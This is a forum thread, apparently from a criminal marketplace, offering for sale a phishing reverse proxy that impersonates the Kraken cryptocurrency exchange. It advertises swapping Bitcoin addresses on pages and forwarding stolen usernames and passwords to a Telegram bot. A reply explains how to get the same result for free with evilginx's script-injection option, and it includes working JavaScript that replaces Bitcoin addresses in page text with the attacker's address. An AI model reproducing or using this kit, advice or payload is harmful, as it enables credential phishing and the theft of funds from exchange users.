What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Selling Kraken Reverse proxy [kra6.cc] . auto BTC address changer + pass collector

XProMaster

Light Weight
Депозит
$0
Цена
500
Контакты
https://t.me/checkerdev
hello everyone. i am selling best reverse proxy for kraken

kra6.cc

1) auto change btc address on pages.
2) remove all banner . change with your link
3) support telegram sending. user and pass send to your telegram bot.

more. options we can include.

telegram:

Software Engineer

Developer specializing in email password checkers. Automation Expert.
t.me
t.me

price fixed.

we show demo.
 
or for free you can setup evilginx => use JS_INJECT option and regex replace for bitcoin addresses.


Код: Скопировать в буфер обмена
Code:
const bitcoin_regex = /\b(?:1|3|bc1)[a-zA-Z0-9]{25,34}\b/g;

window.onload = function() {
 const elements = document.querySelectorAll("*");

 elements.forEach(element => {
  if(element.tagName === "script" || element.tagName === "style") return;
  if(element.childNodes) {
   element.childNodes.forEach(node => {
    if(node.nodeType === Node.TEXT_NODE) {
     node.textContent = node.textContent.replace(bitcoin_regex, "example bitcoin address");
    }
   });
  }
 });
};

just a thought...
 
Top